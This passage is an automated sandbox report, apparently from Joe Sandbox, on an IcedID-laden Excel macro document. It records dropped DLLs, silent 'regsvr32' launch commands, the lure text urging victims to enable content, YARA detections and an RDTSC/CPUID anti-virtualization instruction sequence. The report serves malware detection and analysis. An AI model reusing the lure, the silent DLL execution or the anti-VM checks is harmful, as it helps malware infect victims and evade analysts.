          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
          Source: regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/(be&)
          Source: regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/=be&)
          Source: regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/u
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
          Source: regsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
          Source: regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443

          E-Banking Fraud:

          Yara detected IcedID
          Source: Yara match | File source: dump.pcap, type: PCAP
          Source: Yara match | File source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2176, type: MEMORY
          Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2708, type: MEMORY
          Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3048, type: MEMORY

          System Summary:

          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
          Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 0 | Screenshot OCR: Enable Content button from the yellow bar above
          Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 1 | Screenshot OCR: Enable Content button from the yellow bar above
          Office process drops PE file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XZIBIT.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
          Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00461678 NtQuerySystemInformation,3_2_00461678
          Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02091678 NtQuerySystemInformation,RtlAllocateHeap,4_2_02091678
          Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00201678 NtQuerySystemInformation,RtlAllocateHeap,6_2_00201678
          Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00461810 3_2_00461810
          Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_000007FEF8FB15D0 3_2_000007FEF8FB15D0
          Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_000007FEF8FB41BF 3_2_000007FEF8FB41BF
          Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02091810 4_2_02091810
          Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000007FEF8F915D0 4_2_000007FEF8F915D0
          Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000007FEF8F941BF 4_2_000007FEF8F941BF
          Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00201810 6_2_00201810
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Matched rule: MAL_IcedID_GZIP_LDR_202104 (date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240), matched in:
          Source: 3.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
          Source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
          Source: 6.2.regsvr32.exe.120000.0.raw.unpack, type: UNPACKEDPE
          Source: 6.2.regsvr32.exe.200000.1.unpack, type: UNPACKEDPE
          Source: 3.2.regsvr32.exe.460000.1.unpack, type: UNPACKEDPE
          Source: 6.2.regsvr32.exe.120000.0.unpack, type: UNPACKEDPE
          Source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
          Source: 4.2.regsvr32.exe.2090000.4.unpack, type: UNPACKEDPE
          Source: 3.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
          Source: 00000003.00000002.2099597118.0000000000110000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000006.00000002.2114378210.0000000000120000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000004.00000002.2106878534.0000000000110000.00000004.00000001.sdmp, type: MEMORY
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSM@7/8@15/6
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Purchaseconfirmation-137606.xlsm
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD6AF.tmp
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: Purchaseconfirmation-137606.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
          Source: Purchaseconfirmation-137606.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
          Source: Purchaseconfirmation-137606.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
          Source: Purchaseconfirmation-137606.xlsm | Initial sample: OLE zip file path = xl/calcChain.xml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: XRAY.dll.0.dr | Static PE information: real checksum: 0x1baf8 should be: 0x19d85
          Source: lsdfik[1].fml.0.dr | Static PE information: real checksum: 0x1baf8 should be: 0x19d85

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XZIBIT.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Contains functionality to detect hardware virtualization (CPUID execution measurement)
          Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00461E50 3_2_00461E50
          Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02091E50 4_2_02091E50
          Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00201E50 6_2_00201E50
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 0000000000461E71 second address: 0000000000461E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 0000000000461EAB second address: 0000000000461EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 0000000002091E71 second address: 0000000002091E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 0000000002091EAB second address: 0000000002091EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 0000000000201E71 second address: 0000000000201E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 0000000000201EAB second address: 0000000000201EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00462434 rdtsc 3_2_00462434
          Source: C:\Windows\System32\regsvr32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,3_2_004627BC
          Source: C:\Windows\System32\regsvr32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,4_2_020927BC
          Source: C:\Windows\System32\regsvr32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,6_2_002027BC
